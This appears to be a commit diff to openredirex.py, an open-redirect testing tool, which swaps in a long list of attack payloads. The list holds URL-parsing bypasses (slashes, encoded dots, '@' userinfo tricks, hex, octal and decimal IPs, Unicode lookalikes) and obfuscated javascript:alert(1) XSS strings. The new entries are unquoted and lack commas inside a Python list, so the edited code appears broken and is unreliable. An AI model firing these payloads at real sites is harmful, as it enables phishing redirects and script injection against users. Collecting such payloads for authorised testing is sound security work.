Update openredirex.py

openredirex.py

@@ -18,50 +18,246 @@
 ENDC = '\033[0m'          # Reset to default color
 
 redirect_payloads = [
-"//example.com@google.com/%2f..",
-"///google.com/%2f..",
-"///example.com@google.com/%2f..",
-"////google.com/%2f..",
-"https://google.com/%2f..",
-"https://example.com@google.com/%2f..",
-"/https://google.com/%2f..",
-"/https://example.com@google.com/%2f..",
-"//google.com/%2f%2e%2e",
-"//example.com@google.com/%2f%2e%2e",
-"///google.com/%2f%2e%2e",
-"///example.com@google.com/%2f%2e%2e",
-"////google.com/%2f%2e%2e",
-"/http://example.com",
-"/http:/example.com",
-"/https:/%5cexample.com/",
-"/https://%09/example.com",
-"/https://%5cexample.com",
-"/https:///example.com/%2e%2e",
-"/https:///example.com/%2f%2e%2e",
-"/https://example.com",
-"/https://example.com/",
-"/https://example.com/%2e%2e",
-"/https://example.com/%2e%2e%2f",
-"/https://example.com/%2f%2e%2e",
-"/https://example.com/%2f..",
-"/https://example.com//",
-"/https:example.com",
-"/%09/example.com",
-"/%2f%2fexample.com",
-"/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/",
-"/%5cexample.com",
-"/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d",
-"/.example.com",
-"//%09/example.com",
-"//%5cexample.com",
-"///%09/example.com",
-"///%5cexample.com",
-"////%09/example.com",
-"////%5cexample.com",
-"/////example.com",
-"/////example.com/",
-"////\;@example.com",
-"////example.com/"
+//google.com/%2f..
+//www.whitelisteddomain.tld@google.com/%2f..
+///google.com/%2f..
+///www.whitelisteddomain.tld@google.com/%2f..
+////google.com/%2f..
+////www.whitelisteddomain.tld@google.com/%2f..
+https://google.com/%2f..
+https://www.whitelisteddomain.tld@google.com/%2f..
+/https://google.com/%2f..
+/https://www.whitelisteddomain.tld@google.com/%2f..
+//www.google.com/%2f%2e%2e
+//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+///www.google.com/%2f%2e%2e
+///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+////www.google.com/%2f%2e%2e
+////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+https://www.google.com/%2f%2e%2e
+https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/https://www.google.com/%2f%2e%2e
+/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+//google.com/
+//www.whitelisteddomain.tld@google.com/
+///google.com/
+///www.whitelisteddomain.tld@google.com/
+////google.com/
+////www.whitelisteddomain.tld@google.com/
+https://google.com/
+https://www.whitelisteddomain.tld@google.com/
+/https://google.com/
+/https://www.whitelisteddomain.tld@google.com/
+//google.com//
+//www.whitelisteddomain.tld@google.com//
+///google.com//
+///www.whitelisteddomain.tld@google.com//
+////google.com//
+////www.whitelisteddomain.tld@google.com//
+https://google.com//
+https://www.whitelisteddomain.tld@google.com//
+//https://google.com//
+//https://www.whitelisteddomain.tld@google.com//
+//www.google.com/%2e%2e%2f
+//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+///www.google.com/%2e%2e%2f
+///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+////www.google.com/%2e%2e%2f
+////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+https://www.google.com/%2e%2e%2f
+https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+//https://www.google.com/%2e%2e%2f
+//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
+///www.google.com/%2e%2e
+///www.whitelisteddomain.tld@www.google.com/%2e%2e
+////www.google.com/%2e%2e
+////www.whitelisteddomain.tld@www.google.com/%2e%2e
+https:///www.google.com/%2e%2e
+https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
+//https:///www.google.com/%2e%2e
+//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
+/https://www.google.com/%2e%2e
+/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
+///www.google.com/%2f%2e%2e
+///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+////www.google.com/%2f%2e%2e
+////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+https:///www.google.com/%2f%2e%2e
+https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/https://www.google.com/%2f%2e%2e
+/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/https:///www.google.com/%2f%2e%2e
+/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
+/%09/google.com
+/%09/www.whitelisteddomain.tld@google.com
+//%09/google.com
+//%09/www.whitelisteddomain.tld@google.com
+///%09/google.com
+///%09/www.whitelisteddomain.tld@google.com
+////%09/google.com
+////%09/www.whitelisteddomain.tld@google.com
+https://%09/google.com
+https://%09/www.whitelisteddomain.tld@google.com
+/%5cgoogle.com
+/%5cwww.whitelisteddomain.tld@google.com
+//%5cgoogle.com
+//%5cwww.whitelisteddomain.tld@google.com
+///%5cgoogle.com
+///%5cwww.whitelisteddomain.tld@google.com
+////%5cgoogle.com
+////%5cwww.whitelisteddomain.tld@google.com
+https://%5cgoogle.com
+https://%5cwww.whitelisteddomain.tld@google.com
+/https://%5cgoogle.com
+/https://%5cwww.whitelisteddomain.tld@google.com
+https://google.com
+https://www.whitelisteddomain.tld@google.com
+javascript:alert(1);
+javascript:alert(1)
+//javascript:alert(1);
+/javascript:alert(1);
+//javascript:alert(1)
+/javascript:alert(1)
+/%5cjavascript:alert(1);
+/%5cjavascript:alert(1)
+//%5cjavascript:alert(1);
+//%5cjavascript:alert(1)
+/%09/javascript:alert(1);
+/%09/javascript:alert(1)
+java%0d%0ascript%0d%0a:alert(0)
+//google.com
+https:google.com
+//google%E3%80%82com
+\/\/google.com/
+/\/google.com/
+//google%00.com
+https://www.whitelisteddomain.tld/https://www.google.com/
+";alert(0);//
+javascript://www.whitelisteddomain.tld?%a0alert%281%29
+http://0xd8.0x3a.0xd6.0xce
+http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
+http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
+http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
+http://0xd83ad6ce
+http://www.whitelisteddomain.tld@0xd83ad6ce
+http://3H6k7lIAiqjfNeN@0xd83ad6ce
+http://XY>.7d8T\205pZM@0xd83ad6ce
+http://3627734734
+http://www.whitelisteddomain.tld@3627734734
+http://3H6k7lIAiqjfNeN@3627734734
+http://XY>.7d8T\205pZM@3627734734
+http://472.314.470.462
+http://www.whitelisteddomain.tld@472.314.470.462
+http://3H6k7lIAiqjfNeN@472.314.470.462
+http://XY>.7d8T\205pZM@472.314.470.462
+http://0330.072.0326.0316
+http://www.whitelisteddomain.tld@0330.072.0326.0316
+http://3H6k7lIAiqjfNeN@0330.072.0326.0316
+http://XY>.7d8T\205pZM@0330.072.0326.0316
+http://00330.00072.0000326.00000316
+http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
+http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
+http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
+http://[::216.58.214.206]
+http://www.whitelisteddomain.tld@[::216.58.214.206]
+http://3H6k7lIAiqjfNeN@[::216.58.214.206]
+http://XY>.7d8T\205pZM@[::216.58.214.206]
+http://[::ffff:216.58.214.206]
+http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
+http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
+http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
+http://0xd8.072.54990
+http://www.whitelisteddomain.tld@0xd8.072.54990
+http://3H6k7lIAiqjfNeN@0xd8.072.54990
+http://XY>.7d8T\205pZM@0xd8.072.54990
+http://0xd8.3856078
+http://www.whitelisteddomain.tld@0xd8.3856078
+http://3H6k7lIAiqjfNeN@0xd8.3856078
+http://XY>.7d8T\205pZM@0xd8.3856078
+http://00330.3856078
+http://www.whitelisteddomain.tld@00330.3856078
+http://3H6k7lIAiqjfNeN@00330.3856078
+http://XY>.7d8T\205pZM@00330.3856078
+http://00330.0x3a.54990
+http://www.whitelisteddomain.tld@00330.0x3a.54990
+http://3H6k7lIAiqjfNeN@00330.0x3a.54990
+http://XY>.7d8T\205pZM@00330.0x3a.54990
+http:0xd8.0x3a.0xd6.0xce
+http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
+http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
+http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
+http:0xd83ad6ce
+http:www.whitelisteddomain.tld@0xd83ad6ce
+http:3H6k7lIAiqjfNeN@0xd83ad6ce
+http:XY>.7d8T\205pZM@0xd83ad6ce
+http:3627734734
+http:www.whitelisteddomain.tld@3627734734
+http:3H6k7lIAiqjfNeN@3627734734
+http:XY>.7d8T\205pZM@3627734734
+http:472.314.470.462
+http:www.whitelisteddomain.tld@472.314.470.462
+http:3H6k7lIAiqjfNeN@472.314.470.462
+http:XY>.7d8T\205pZM@472.314.470.462
+http:0330.072.0326.0316
+http:www.whitelisteddomain.tld@0330.072.0326.0316
+http:3H6k7lIAiqjfNeN@0330.072.0326.0316
+http:XY>.7d8T\205pZM@0330.072.0326.0316
+http:00330.00072.0000326.00000316
+http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
+http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
+http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
+http:[::216.58.214.206]
+http:www.whitelisteddomain.tld@[::216.58.214.206]
+http:3H6k7lIAiqjfNeN@[::216.58.214.206]
+http:XY>.7d8T\205pZM@[::216.58.214.206]
+http:[::ffff:216.58.214.206]
+http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
+http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
+http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
+http:0xd8.072.54990
+http:www.whitelisteddomain.tld@0xd8.072.54990
+http:3H6k7lIAiqjfNeN@0xd8.072.54990
+http:XY>.7d8T\205pZM@0xd8.072.54990
+http:0xd8.3856078
+http:www.whitelisteddomain.tld@0xd8.3856078
+http:3H6k7lIAiqjfNeN@0xd8.3856078
+http:XY>.7d8T\205pZM@0xd8.3856078
+http:00330.3856078
+http:www.whitelisteddomain.tld@00330.3856078
+http:3H6k7lIAiqjfNeN@00330.3856078
+http:XY>.7d8T\205pZM@00330.3856078
+http:00330.0x3a.54990
+http:www.whitelisteddomain.tld@00330.0x3a.54990
+http:3H6k7lIAiqjfNeN@00330.0x3a.54990
+http:XY>.7d8T\205pZM@00330.0x3a.54990
+〱google.com
+〵google.com
+ゝgoogle.com
+ーgoogle.com
+ｰgoogle.com
+/〱google.com
+/〵google.com
+/ゝgoogle.com
+/ーgoogle.com
+/ｰgoogle.com
+%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
+http://%67%6f%6f%67%6c%65%2e%63%6f%6d
+<>javascript:alert(1);
+<>//google.com
+//google.com\@www.whitelisteddomain.tld
+https://:@google.com\@www.whitelisteddomain.tld
+\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
+\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
+ja\nva\tscript\r:alert(1)
+\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
+\152\141\166\141\163\143\162\151\160\164\072alert(1)
+http://google.com:80#@www.whitelisteddomain.tld/
+http://google.com:80?@www.whitelisteddomain.tld/
+http://google.com\www.whitelisteddomain.tld
+http://google.com&www.whitelisteddomain.tld
+http:///////////google.com
+\\google.com
+http://www.whitelisteddomain.tld.google.com
 ]
 
 async def load_payloads(payloads_file):